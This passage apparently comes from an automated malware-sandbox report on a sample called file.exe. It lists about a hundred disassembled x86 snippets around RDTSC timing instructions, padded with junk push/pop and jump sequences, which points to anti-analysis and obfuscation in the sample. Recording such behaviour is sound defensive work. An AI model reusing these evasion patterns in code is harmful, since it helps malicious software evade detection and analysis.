            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9552C second address: C95546 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F6194h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C95546 second address: C95563 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F82E8EDE525h 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C998EA second address: C99900 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jc 00007F82E84F6186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F82E84F618Eh 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99900 second address: C99904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C99904 second address: C9992D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 jmp 00007F82E84F6198h 0x0000000c popad 0x0000000d push esi 0x0000000e jl 00007F82E84F6186h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C98FFB second address: C99028 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jng 00007F82E8EDE516h 0x0000000b jl 00007F82E8EDE516h 0x00000011 jmp 00007F82E8EDE525h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 pushad 0x0000001a push ecx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C994C8 second address: C994CE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C5D9 second address: C9C5EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E8EDE51Fh 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9C5EC second address: C9C5F6 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F82E84F6186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DF76 second address: C9DF7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DF7A second address: C9DF84 instructions: 0x00000000 rdtsc 0x00000002 je 00007F82E84F6186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C9DF84 second address: C9E005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F82E8EDE520h 0x0000000b jmp 00007F82E8EDE523h 0x00000010 jmp 00007F82E8EDE523h 0x00000015 popad 0x00000016 pushad 0x00000017 jmp 00007F82E8EDE523h 0x0000001c jnc 00007F82E8EDE524h 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F82E8EDE528h 0x00000029 pushad 0x0000002a popad 0x0000002b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA638D second address: CA6397 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F82E84F6186h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA4342 second address: CA435C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F82E8EDE516h 0x0000000a popad 0x0000000b jmp 00007F82E8EDE51Fh 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA468D second address: CA4693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA4693 second address: CA46A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007F82E8EDE51Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA46A0 second address: CA46A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9481 second address: CA9485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9B93 second address: CA9B99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9B99 second address: CA9B9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9B9F second address: CA9BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E84F618Ch 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9BAF second address: CA9BCD instructions: 0x00000000 rdtsc 0x00000002 jl 00007F82E8EDE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f jnl 00007F82E8EDE516h 0x00000015 pop eax 0x00000016 push eax 0x00000017 push edx 0x00000018 jnl 00007F82E8EDE516h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9BCD second address: CA9BD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9BD1 second address: CA9BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007F82E8EDE516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9F99 second address: CA9F9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9F9E second address: CA9FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CA9FA4 second address: CA9FA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB769A second address: CB76AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F82E8EDE516h 0x0000000e jp 00007F82E8EDE516h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB76AE second address: CB76C5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F82E84F6191h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB76C5 second address: CB76E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F82E8EDE527h 0x00000008 jng 00007F82E8EDE516h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5D5B second address: CB5D71 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 ja 00007F82E84F6186h 0x0000000b pop ebx 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5D71 second address: CB5D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5D75 second address: CB5D81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F82E84F6186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5EC9 second address: CB5ED4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5ED4 second address: CB5F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F82E84F6194h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d jmp 00007F82E84F6190h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB5F02 second address: CB5F08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6072 second address: CB607F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F82E84F6186h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB607F second address: CB608E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F82E8EDE516h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB608E second address: CB6094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6094 second address: CB6098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6098 second address: CB60A2 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F82E84F6186h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB620C second address: CB6230 instructions: 0x00000000 rdtsc 0x00000002 js 00007F82E8EDE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F82E8EDE51Fh 0x00000014 jng 00007F82E8EDE516h 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6230 second address: CB623C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007F82E84F6186h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB623C second address: CB6248 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007F82E8EDE516h 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB6373 second address: CB6384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jg 00007F82E84F6186h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB64DD second address: CB64E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB7565 second address: CB756B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB756B second address: CB756F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CB756F second address: CB7573 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CBDF4F second address: CBDF60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jns 00007F82E8EDE518h 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9321 second address: CC9326 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9326 second address: CC9337 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F82E8EDE51Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CC9337 second address: CC935C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 js 00007F82E84F61A3h 0x0000000d jmp 00007F82E84F6191h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCCCA1 second address: CCCCC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE527h 0x00000007 jnc 00007F82E8EDE526h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF525 second address: CCF564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 jmp 00007F82E84F6192h 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 popad 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007F82E84F6196h 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CCF564 second address: CCF568 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2A00 second address: CD2A08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2A08 second address: CD2A19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push edi 0x00000007 pop edi 0x00000008 pushad 0x00000009 popad 0x0000000a jng 00007F82E8EDE516h 0x00000010 popad 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2A19 second address: CD2A48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F82E84F6186h 0x00000009 jmp 00007F82E84F6196h 0x0000000e push esi 0x0000000f pop esi 0x00000010 popad 0x00000011 push ebx 0x00000012 jmp 00007F82E84F618Ah 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2A48 second address: CD2A76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jng 00007F82E8EDE55Ch 0x0000000d pushad 0x0000000e jnl 00007F82E8EDE516h 0x00000014 jng 00007F82E8EDE516h 0x0000001a jmp 00007F82E8EDE51Fh 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2A76 second address: CD2A7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2C2D second address: CD2C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD2C31 second address: CD2C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7A74 second address: CD7A9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F82E8EDE51Ch 0x0000000f pushad 0x00000010 jmp 00007F82E8EDE51Dh 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CD7A9A second address: CD7AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F82E84F6198h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE25B6 second address: CE25ED instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnp 00007F82E8EDE516h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jo 00007F82E8EDE525h 0x00000012 jmp 00007F82E8EDE51Fh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F82E8EDE524h 0x0000001e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE25ED second address: CE25F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE25F3 second address: CE25F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE25F7 second address: CE260B instructions: 0x00000000 rdtsc 0x00000002 js 00007F82E84F6186h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007F82E84F6186h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE48F3 second address: CE490F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE528h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE915E second address: CE918D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F82E84F6186h 0x00000009 jmp 00007F82E84F6197h 0x0000000e jmp 00007F82E84F618Ah 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE918D second address: CE9191 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9191 second address: CE91D1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F82E84F6195h 0x00000011 jg 00007F82E84F6186h 0x00000017 jng 00007F82E84F6186h 0x0000001d popad 0x0000001e jmp 00007F82E84F618Fh 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE946D second address: CE9472 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9472 second address: CE947B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE95EF second address: CE95F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE95F3 second address: CE9607 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jp 00007F82E84F618Eh 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9607 second address: CE960E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9764 second address: CE9797 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E84F6196h 0x00000009 popad 0x0000000a jmp 00007F82E84F6198h 0x0000000f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9797 second address: CE97BD instructions: 0x00000000 rdtsc 0x00000002 jc 00007F82E8EDE518h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F82E8EDE51Ah 0x00000016 pop edx 0x00000017 jnp 00007F82E8EDE51Ah 0x0000001d push ebx 0x0000001e pop ebx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA3D0 second address: CEA3D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA3D4 second address: CEA3E2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F82E8EDE516h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA3E2 second address: CEA3E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA3E6 second address: CEA403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F82E8EDE527h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF32EF second address: CF32FB instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push edx 0x00000008 pop edx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ebx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF32FB second address: CF331A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F82E8EDE51Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F82E8EDE51Dh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF331A second address: CF331E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF331E second address: CF3324 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFD9F9 second address: CFD9FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC437 second address: CFC451 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F82E8EDE524h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC451 second address: CFC455 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC455 second address: CFC45B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A3EE second address: D0A3F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A3F2 second address: D0A3F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A3F6 second address: D0A400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A400 second address: D0A406 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A406 second address: D0A416 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F82E84F6186h 0x00000008 jng 00007F82E84F6186h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A416 second address: D0A41E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A41E second address: D0A422 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0CC9B second address: D0CC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
